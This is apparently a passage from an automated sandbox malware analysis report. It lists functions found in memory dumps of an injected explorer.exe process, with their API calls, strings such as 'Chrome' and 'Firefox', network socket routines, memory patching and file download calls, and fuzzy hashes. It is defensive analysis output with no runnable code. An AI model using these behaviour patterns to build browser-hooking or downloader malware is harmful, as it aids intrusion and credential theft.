Part of subcall function 08CB4704: RaiseException.KERNEL32 ref: 08CB47D2

Strings

bad allocation, xrefs: 08CB32DA

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1214304046-2104205924
Opcode ID: 823a9260558515b389c713c7517b614d42d336d975b9489b46443dbdab2b5a53
Instruction ID: 0bbf7db49a99ffceafd296684ce1a6aa9b89a2bb58832edcf4d25b9f3db3b857
Opcode Fuzzy Hash: 823a9260558515b389c713c7517b614d42d336d975b9489b46443dbdab2b5a53
Instruction Fuzzy Hash: 8E01F525705F8A80EF189BA1F1507E863B4FB88785F444020DA8D07B66EF38C19ACB01

Function 0F3DA040 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41stringprocessCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 0F3DA071
lstrcatA.KERNEL32 ref: 0F3DA082
CreateProcessA.KERNEL32 ref: 0F3DA0F3

Strings

h, xrefs: 0F3DA0EB

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateProcesslstrcatlstrcpy
String ID: h
API String ID: 1023358534-2439710439
Opcode ID: 606a3f0513c2a8636585ca927cd899bd88e9c71b2d70d5b99ca42d7cb687c9bd
Instruction ID: d6007a74486c7ebba4fd02523cb0ac92fe6cf6df2ff8420d256dcace508d13ad
Opcode Fuzzy Hash: 606a3f0513c2a8636585ca927cd899bd88e9c71b2d70d5b99ca42d7cb687c9bd
Instruction Fuzzy Hash: 0A112E33A24A459AE720CB68E8447AE77F4F788358F400125DB8D42E68DF7CC15CCB00

Function 0C37D02E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0C36BD1C: _getptd.LIBCMT ref: 0C36BD29
Part of subcall function 0C36BD1C: _inconsistency.LIBCMT ref: 0C36BD37
Part of subcall function 0C36BD1C: _getptd.LIBCMT ref: 0C36BD3C
Part of subcall function 0C36BD1C: _inconsistency.LIBCMT ref: 0C36BD58

__DestructExceptionObject.LIBCMT ref: 0C37D07B
_getptd.LIBCMT ref: 0C37D081
_getptd.LIBCMT ref: 0C37D094

Part of subcall function 0C36BDAC: _getptd.LIBCMT ref: 0C36BDB5

Strings

csm, xrefs: 0C37D04E

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
Instruction ID: 0a275478d3be764ac9e9b43edebd064dc70bec15bc099c50366e706eed6c3bcf
Opcode Fuzzy Hash: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
Instruction Fuzzy Hash: 20F0816262064589CB309F72D8843EC2364FF58B98F18A221CE498BB09CE34C4C6DB52

Function 08B9BFC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 08B994D4: _getptd.LIBCMT ref: 08B994E1
Part of subcall function 08B994D4: _inconsistency.LIBCMT ref: 08B994EF
Part of subcall function 08B994D4: _getptd.LIBCMT ref: 08B994F4
Part of subcall function 08B994D4: _inconsistency.LIBCMT ref: 08B99510

__DestructExceptionObject.LIBCMT ref: 08B9C010
_getptd.LIBCMT ref: 08B9C016
_getptd.LIBCMT ref: 08B9C029

Part of subcall function 08B99564: _getptd.LIBCMT ref: 08B9956D

Strings

csm, xrefs: 08B9BFE3

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
Instruction ID: 5823a65d4fbdc6f64d143c7225be7ba1d857cbe244d1e97e17a5113bdd7d2126
Opcode Fuzzy Hash: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
Instruction Fuzzy Hash: 2EF04F36241681CACF30EF31DC903AD6B64E749B9AF48A4B9DAC94B714EF31C482D740

Function 08CBCBC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 08CBA0D4: _getptd.LIBCMT ref: 08CBA0E1
Part of subcall function 08CBA0D4: _inconsistency.LIBCMT ref: 08CBA0EF
Part of subcall function 08CBA0D4: _getptd.LIBCMT ref: 08CBA0F4
Part of subcall function 08CBA0D4: _inconsistency.LIBCMT ref: 08CBA110

__DestructExceptionObject.LIBCMT ref: 08CBCC10
_getptd.LIBCMT ref: 08CBCC16
_getptd.LIBCMT ref: 08CBCC29

Part of subcall function 08CBA164: _getptd.LIBCMT ref: 08CBA16D

Strings

csm, xrefs: 08CBCBE3

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
Instruction ID: c543fca8dd5584f5e7e76934a762c835fd731455275edf761fdf3afba8c9c8d8
Opcode Fuzzy Hash: 3254dcd5314069fb337d7a9132ea1397ccb97e267cb37e167d777d480f6b6a71
Instruction Fuzzy Hash: CDF04F76281E91CACB24AF32D8803ED2374E755B9AF485535DE494B704EF34C9C2D744

Function 0F3EDC2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0F3DC91C: _getptd.LIBCMT ref: 0F3DC929
Part of subcall function 0F3DC91C: _inconsistency.LIBCMT ref: 0F3DC937
Part of subcall function 0F3DC91C: _getptd.LIBCMT ref: 0F3DC93C
Part of subcall function 0F3DC91C: _inconsistency.LIBCMT ref: 0F3DC958

__DestructExceptionObject.LIBCMT ref: 0F3EDC7B
_getptd.LIBCMT ref: 0F3EDC81
_getptd.LIBCMT ref: 0F3EDC94

Part of subcall function 0F3DC9AC: _getptd.LIBCMT ref: 0F3DC9B5

Strings

csm, xrefs: 0F3EDC4E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
Instruction ID: 9f5a07983b59e8e131633c4dab556da699f5ea3d3a2cfbab22ed5f70b4c091c1
Opcode Fuzzy Hash: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
Instruction Fuzzy Hash: 3CF03C7768069189CB20AF31D8806AC33A4EB55BA9F485021EE0D8B786DF74E586D341

Function 0C36B1A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 0C36B1B2
malloc.LIBCMT ref: 0C36B1BE

Part of subcall function 0C36C324: _NMSG_WRITE.LIBCMT ref: 0C36C35E
Part of subcall function 0C36C324: _callnewh.LIBCMT ref: 0C36C392
Part of subcall function 0C36C324: _errno.LIBCMT ref: 0C36C39D
Part of subcall function 0C36C324: _errno.LIBCMT ref: 0C36C3A8

_CxxThrowException.LIBCMT ref: 0C36B207

Strings

HeapSize, xrefs: 0C36B1F6

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$ExceptionThrowmalloc
String ID: HeapSize
API String ID: 431260796-169348363
Opcode ID: c4eded4a2cbbcf220981e3be27f6b741052388417c2c680b0f1c9c59d7a4c372
Instruction ID: d065b327974b3a404b6fb477fe8dee8ac5b3e38153f45661f21fa53a2c993faf
Opcode Fuzzy Hash: c4eded4a2cbbcf220981e3be27f6b741052388417c2c680b0f1c9c59d7a4c372
Instruction Fuzzy Hash: 61F05E62331B4A92EE249B50B4407999364FB85388F4895219A8E4BF28EE7CE25DCF01

Function 0F3DBDA4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 0F3DBDB2
malloc.LIBCMT ref: 0F3DBDBE

Part of subcall function 0F3DCF24: _FF_MSGBANNER.LIBCMT ref: 0F3DCF54
Part of subcall function 0F3DCF24: _NMSG_WRITE.LIBCMT ref: 0F3DCF5E
Part of subcall function 0F3DCF24: HeapAlloc.KERNEL32 ref: 0F3DCF79
Part of subcall function 0F3DCF24: _callnewh.LIBCMT ref: 0F3DCF92
Part of subcall function 0F3DCF24: _errno.LIBCMT ref: 0F3DCF9D
Part of subcall function 0F3DCF24: _errno.LIBCMT ref: 0F3DCFA8

_CxxThrowException.LIBCMT ref: 0F3DBE07

Part of subcall function 0F3DC474: RtlPcToFileHeader.KERNEL32 ref: 0F3DC503
Part of subcall function 0F3DC474: RaiseException.KERNEL32 ref: 0F3DC542

Strings

bad allocation, xrefs: 0F3DBDCE

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1214304046-2104205924
Opcode ID: 00dfcfc9c25bae0ac706d58d4140b2f4968f72e33d59bd5dbb3d11c9ed23155b
Instruction ID: 8bdf97c984387908fbbe42685868ab3a29a6c07b01d5129e95051161abba4e08
Opcode Fuzzy Hash: 00dfcfc9c25bae0ac706d58d4140b2f4968f72e33d59bd5dbb3d11c9ed23155b
Instruction Fuzzy Hash: 35F05E62A01B4B91DE34AB51B4403A5A364E7953A4F841531AA8E4BF66EF3CE289CB00

Function 08CBBEC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 08CBBEEF
PathFindFileNameA.SHLWAPI ref: 08CBBEFA
lstrcmpiA.KERNEL32 ref: 08CBBF0A

Part of subcall function 08CBBF44: HeapCreate.KERNEL32 ref: 08CBBF61
Part of subcall function 08CBBF44: GetModuleHandleW.KERNEL32 ref: 08CBBF7D
Part of subcall function 08CBBF44: GetProcAddress.KERNEL32 ref: 08CBBF92
Part of subcall function 08CBBF44: GetModuleHandleW.KERNEL32 ref: 08CBBFAC
Part of subcall function 08CBBF44: GetProcAddress.KERNEL32 ref: 08CBBFC1

Strings

explorer.exe, xrefs: 08CBBF00

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Module$AddressFileHandleNameProc$CreateFindHeapPathlstrcmpi
String ID: explorer.exe
API String ID: 906591878-3187896405
Opcode ID: d38017639a78c50223703cd48cbe2de7434eec92683d371d93e8d63aa0aa8543
Instruction ID: a503d42ae5ba3bfe4d1a9b75c40b505b182fb7f86fabf19cbbb4745d588c97eb
Opcode Fuzzy Hash: d38017639a78c50223703cd48cbe2de7434eec92683d371d93e8d63aa0aa8543
Instruction Fuzzy Hash: 9DF06D24B18E8282FB34EB61E855B996370BB88759F80812596CF42664EF7CC34ACB10

Function 0F3D7F20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0F3C5BF0: HeapCreate.KERNEL32 ref: 0F3C5C0D

Part of subcall function 0F3DAE60: lstrcpy.KERNEL32 ref: 0F3DAEA0

RtlInitializeCriticalSection.NTDLL ref: 0F3D7F51
RtlInitializeCriticalSection.NTDLL ref: 0F3D7F5E

Strings

Chrome, xrefs: 0F3D7F37
Firefox, xrefs: 0F3D7F29

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CreateHeaplstrcpy
String ID: Chrome$Firefox
API String ID: 3526404123-2335468407
Opcode ID: 42660b885f862db325dc9c344f82a0105f74950fec2dd825d99bffef76b8c342
Instruction ID: a4f8474a90790cd839a675bfda12eeeb080d58ea736d7a6cf234c259d5b01d4a
Opcode Fuzzy Hash: 42660b885f862db325dc9c344f82a0105f74950fec2dd825d99bffef76b8c342
Instruction Fuzzy Hash: 1AE09264921B0795FA64BB10FC8436633A9B758725F81053AC91E06A32EF3C826DE300

Function 0F3C1AB0 Relevance: 6.2, APIs: 4, Instructions: 169stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 0F3C1B9D
_errno.MSVCRT ref: 0F3C1BB9
strtol.MSVCRT ref: 0F3C1BD2
_errno.MSVCRT ref: 0F3C1BDA

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$isxdigitstrtol
String ID:
API String ID: 1632192098-0
Opcode ID: d922dc6d5474ad0d7677fb4ea62b6d4376047efc0216317633cf8026a9a37112
Instruction ID: fb032577d41ab989a28a160c3ad2fdbc44c76b7e2775589b5f5c12a888091505
Opcode Fuzzy Hash: d922dc6d5474ad0d7677fb4ea62b6d4376047efc0216317633cf8026a9a37112
Instruction Fuzzy Hash: 6C513817B0478086DB21BB29D8103AB7B50F785BB4FD98629DF4A07793DA7CD844E780

Function 0C35A014 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

___lc_locale_name_func.LIBCMT ref: 0C36AB7C

Part of subcall function 0C36CF50: _getptd.LIBCMT ref: 0C36CF54
Part of subcall function 0C36CF50: __updatetlocinfo.LIBCMT ref: 0C36CF77

___lc_collate_cp_func.LIBCMT ref: 0C36AB85

Part of subcall function 0C36CF18: _getptd.LIBCMT ref: 0C36CF1C
Part of subcall function 0C36CF18: __updatetlocinfo.LIBCMT ref: 0C36CF3F

__crtLCMapStringA.LIBCMT ref: 0C36ABE2

Part of subcall function 0C36DCAC: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C36DCCC
Part of subcall function 0C36DCAC: __crtLCMapStringA_stat.LIBCMT ref: 0C36DD18

__crtLCMapStringA.LIBCMT ref: 0C36AC1A

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: String__crt$Locale__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func
String ID:
API String ID: 979804331-0
Opcode ID: d30e6f89f2d461f1f5cdfa3d35a9307a5348bc4dd50a3e2d821cd10aaf73d924
Instruction ID: 5d8ef119433c36a63b047ce700c3419b9f9bf863de25dc72b40249be2945ea8b
Opcode Fuzzy Hash: d30e6f89f2d461f1f5cdfa3d35a9307a5348bc4dd50a3e2d821cd10aaf73d924
Instruction Fuzzy Hash: F321B8723247848AD720AF22E44475ABBA5F344FE8F198625EF5967F4CCB78C4419F44

Function 0F3CAC14 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

___lc_locale_name_func.LIBCMT ref: 0F3DB77C

Part of subcall function 0F3DDB50: _getptd.LIBCMT ref: 0F3DDB54
Part of subcall function 0F3DDB50: __updatetlocinfo.LIBCMT ref: 0F3DDB77

___lc_collate_cp_func.LIBCMT ref: 0F3DB785

Part of subcall function 0F3DDB18: _getptd.LIBCMT ref: 0F3DDB1C
Part of subcall function 0F3DDB18: __updatetlocinfo.LIBCMT ref: 0F3DDB3F

__crtLCMapStringA.LIBCMT ref: 0F3DB7E2

Part of subcall function 0F3DE8AC: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3DE8CC
Part of subcall function 0F3DE8AC: __crtLCMapStringA_stat.LIBCMT ref: 0F3DE918

__crtLCMapStringA.LIBCMT ref: 0F3DB81A

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: String__crt$Locale__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func
String ID:
API String ID: 979804331-0
Opcode ID: 2545303a4f5da43f65af91d60b331fc5c8220b279db15caee34b6e4b3dcf86b6
Instruction ID: c7a21d81f09e5bfa37d392cf60b76a483c1c7c4f45349211d106a7cba9179853
Opcode Fuzzy Hash: 2545303a4f5da43f65af91d60b331fc5c8220b279db15caee34b6e4b3dcf86b6
Instruction Fuzzy Hash: 75219F7361478086DB209F22A44475EBAA4F384FF4F5A4629FE6A1BB5ACB38C4418B44

Function 0F3C5648 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0F3C5692
VirtualProtect.KERNEL32 ref: 0F3C56F9
GetCurrentProcess.KERNEL32 ref: 0F3C56FF
FlushInstructionCache.KERNEL32 ref: 0F3C570E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
String ID:
API String ID: 4115577372-0
Opcode ID: 08b5bf7c70693a31564a796b8e0c4b8709cf614fe27f3d5533824de36d98544d
Instruction ID: a531bb0dc1d630e3c18358b2b304adba4fcf93b08cf66ea5198875f4d457805f
Opcode Fuzzy Hash: 08b5bf7c70693a31564a796b8e0c4b8709cf614fe27f3d5533824de36d98544d
Instruction Fuzzy Hash: 1531F2632086C18AD7208F35E9003AD7B60F745F98F4D521ADFD947B8ACB78E861C754

Function 0F3C6C2C Relevance: 6.1, APIs: 4, Instructions: 72filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0F3C6CC3
CopyFileA.KERNEL32 ref: 0F3C6CD9

Part of subcall function 0F3C6D60: CreateFileA.KERNEL32 ref: 0F3C6DAB

StrChrA.SHLWAPI ref: 0F3C6CEB
strtol.MSVCRT ref: 0F3C6D03

Part of subcall function 0F3C69E4: lstrlenA.KERNEL32 ref: 0F3C6A7C
Part of subcall function 0F3C69E4: InternetCrackUrlA.WININET ref: 0F3C6A91
Part of subcall function 0F3C69E4: PathFindFileNameA.SHLWAPI ref: 0F3C6B08
Part of subcall function 0F3C69E4: GetTempPathA.KERNEL32 ref: 0F3C6B26
Part of subcall function 0F3C69E4: GetTempFileNameA.KERNEL32 ref: 0F3C6B3C
Part of subcall function 0F3C69E4: lstrcatA.KERNEL32 ref: 0F3C6B4C
Part of subcall function 0F3C69E4: lstrcatA.KERNEL32 ref: 0F3C6B58
Part of subcall function 0F3C69E4: CreateFileA.KERNEL32 ref: 0F3C6B83

Part of subcall function 0F3C6638: SHGetFolderPathA.SHELL32 ref: 0F3C6671
Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C6681
Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C668F
Part of subcall function 0F3C6638: CreateDirectoryA.KERNEL32 ref: 0F3C669A
Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66AA
Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66B8
Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66C8

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$File$CreatePath$NameTemp$CloseCopyCrackDirectoryFindFolderHandleInternetlstrlenstrtol
String ID:
API String ID: 44311351-0
Opcode ID: 77c53c1dcb3057e23f829fe1a00cdfdb0231b304ccc22d02b2d45c231354240f
Instruction ID: 436faf784860e6b7646be3d90b562a589f79fcda6a05b4d026259607d8cbe740
Opcode Fuzzy Hash: 77c53c1dcb3057e23f829fe1a00cdfdb0231b304ccc22d02b2d45c231354240f
Instruction Fuzzy Hash: 9221292230868182EB34EB25F4957BDA761FBC8764F844139C94D47E46DF2DCE49C791

Function 0C35A00C Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.LIBCMT ref: 0C36A8EC

Part of subcall function 0C36CF50: _getptd.LIBCMT ref: 0C36CF54
Part of subcall function 0C36CF50: __updatetlocinfo.LIBCMT ref: 0C36CF77

___lc_collate_cp_func.LIBCMT ref: 0C36A8F5

Part of subcall function 0C36CF18: _getptd.LIBCMT ref: 0C36CF1C
Part of subcall function 0C36CF18: __updatetlocinfo.LIBCMT ref: 0C36CF3F

__crtCompareStringA.LIBCMT ref: 0C36A950

Part of subcall function 0C36D7A0: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C36D7C0
Part of subcall function 0C36D7A0: __crtCompareStringA_stat.LIBCMT ref: 0C36D801

_errno.LIBCMT ref: 0C36A959

Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: CompareLocaleString__crt__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func_errno_getptd_noexit
String ID:
API String ID: 1842237460-0
Opcode ID: 0c9d195b3829e0dd00895f10f764b3000c2450701e0a1e2e193eb430086f0220
Instruction ID: ddf9a328461667baf771e50acd7cadf8c83a97fbf1e32a963dafdc5a77aac42b
Opcode Fuzzy Hash: 0c9d195b3829e0dd00895f10f764b3000c2450701e0a1e2e193eb430086f0220
Instruction Fuzzy Hash: B911E732720784869B108F26D48011EBBE4F784FD4B558229EF9A67F5CDB38C4419F40

Function 0F3CAC0C Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.LIBCMT ref: 0F3DB4EC

Part of subcall function 0F3DDB50: _getptd.LIBCMT ref: 0F3DDB54
Part of subcall function 0F3DDB50: __updatetlocinfo.LIBCMT ref: 0F3DDB77

___lc_collate_cp_func.LIBCMT ref: 0F3DB4F5

Part of subcall function 0F3DDB18: _getptd.LIBCMT ref: 0F3DDB1C
Part of subcall function 0F3DDB18: __updatetlocinfo.LIBCMT ref: 0F3DDB3F

__crtCompareStringA.LIBCMT ref: 0F3DB550

Part of subcall function 0F3DE3A0: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3DE3C0
Part of subcall function 0F3DE3A0: __crtCompareStringA_stat.LIBCMT ref: 0F3DE401

_errno.LIBCMT ref: 0F3DB559

Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CompareLocaleString__crt__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func_errno_getptd_noexit
String ID:
API String ID: 1842237460-0
Opcode ID: 34423c1fe34a1868ffe0ea850ec384deebba731913f09c9ef5ef6fd5cfb1df5d
Instruction ID: 92cb45e3b94d4f1e57ee3747974752eca758c35c337f0c542d7b3fc6c9cdfbb6
Opcode Fuzzy Hash: 34423c1fe34a1868ffe0ea850ec384deebba731913f09c9ef5ef6fd5cfb1df5d
Instruction Fuzzy Hash: 6F11A27370478486CB10CF26B48011EFBA5F7C4FE0B864229FE894BB6ADB38D4518740

Function 0F3DAB54 Relevance: 6.0, APIs: 4, Instructions: 44networksleepCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0F3DAB76
recv.WS2_32 ref: 0F3DABB7
send.WS2_32 ref: 0F3DABD6
Sleep.KERNEL32 ref: 0F3DABE7

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleepioctlsocketrecvsend
String ID:
API String ID: 1168213214-0
Opcode ID: f58876c3c849c7fe1e4bf5bd079a8242b1d777b0f55ea3f367d15615d9844685
Instruction ID: 50f670670aa85470ec7174ed796babc0d9d450e93456beede3d8cd42d52adf80
Opcode Fuzzy Hash: f58876c3c849c7fe1e4bf5bd079a8242b1d777b0f55ea3f367d15615d9844685
Instruction Fuzzy Hash: 3611CC2270468182EB309B39F5043AA2392F798BB4F444135DE4947A96DF3CC589CF80

Function 0F3DAA04 Relevance: 6.0, APIs: 4, Instructions: 41networkthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3DAAA0: WSAStartup.WS2_32 ref: 0F3DAAC7
Part of subcall function 0F3DAAA0: socket.WS2_32 ref: 0F3DAADC
Part of subcall function 0F3DAAA0: gethostbyname.WS2_32 ref: 0F3DAAEE
Part of subcall function 0F3DAAA0: memcpy.MSVCRT ref: 0F3DAB05
Part of subcall function 0F3DAAA0: htons.WS2_32 ref: 0F3DAB13
Part of subcall function 0F3DAAA0: connect.WS2_32 ref: 0F3DAB2A

send.WS2_32 ref: 0F3DAA37
CreateThread.KERNEL32 ref: 0F3DAA66
recv.WS2_32 ref: 0F3DAA80
??3@YAXPEAX@Z.MSVCRT ref: 0F3DAA8D

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@CreateStartupThreadconnectgethostbynamehtonsmemcpyrecvsendsocket
String ID:
API String ID: 2800620577-0
Opcode ID: 202c2c117270ac005d77ff0757f8c36dd695a4c546fe129276d671d5e3a27d32
Instruction ID: 8424116900b58be85e389a5aaac57c3c937a91cd604c81553814c75c7a2bede4
Opcode Fuzzy Hash: 202c2c117270ac005d77ff0757f8c36dd695a4c546fe129276d671d5e3a27d32
Instruction Fuzzy Hash: 1A01C03361478183EB249F21F6087AA73A1F785BB5F444731EA5546AA5DF7CC68ACB00

Function 0F3C5D40 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMON

Download Yara Rule

APIs

OpenThread.KERNEL32 ref: 0F3C5D6B
ResumeThread.KERNEL32 ref: 0F3C5D7C
CloseHandle.KERNEL32 ref: 0F3C5D85
HeapFree.KERNEL32 ref: 0F3C5D9E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseFreeHandleHeapOpenResume
String ID:
API String ID: 993137029-0
Opcode ID: 3d431951645bc05cb01c584ab524e85c753577a256068b6a56c3bb23de631370
Instruction ID: 7c032713c2faafcb793ceaff110937b5cc0bf183159e05155e5e761be138899c
Opcode Fuzzy Hash: 3d431951645bc05cb01c584ab524e85c753577a256068b6a56c3bb23de631370
